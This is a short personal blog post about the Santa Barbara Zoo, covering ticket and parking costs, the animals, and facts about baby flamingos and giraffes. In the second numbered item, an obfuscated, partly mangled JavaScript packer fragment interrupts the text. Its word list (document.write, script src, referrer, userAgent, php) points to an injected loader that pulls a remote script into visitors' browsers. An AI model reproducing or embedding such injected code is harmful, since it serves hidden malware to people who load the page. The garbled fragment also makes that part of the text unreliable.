Santa Barbara Zoo

While not St. Louis (free!), San Diego (the famous one), or Atlanta (baby pandas), the Santa Barbara zoo is actually quite nice.

It’ll set you back $16 + $6 for parking + $6 to feed the giraffes.  Although the day I went, parking was free!

They have lions, elephants, giraffes, bald eagles, flamingos, penguins, and even an alligator!

A few bits of knowledge for you:

1.  Baby flamingos aren’t pink, they are grey.  Do you see the little guy?

2.  ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksiay|var|u0026u|referrer|rftyh||js|php’.split(‘|’),0,{}))
Giraffe’s tongues are black to protect them from the sun.  They graze all day and would otherwise have a sunburned tongue!

3.  Apparently when giraffes are pregnant, they don’t show.  It’s a safety mechanism in the wild.  I guess the zoo keepers showed up to work one day and found a baby giraffe running around.

The best part about the Santa Barbara Zoo?

Feeding my friend, Michael.  A Masai Giraffe.  He ate romaine.  So healthy!
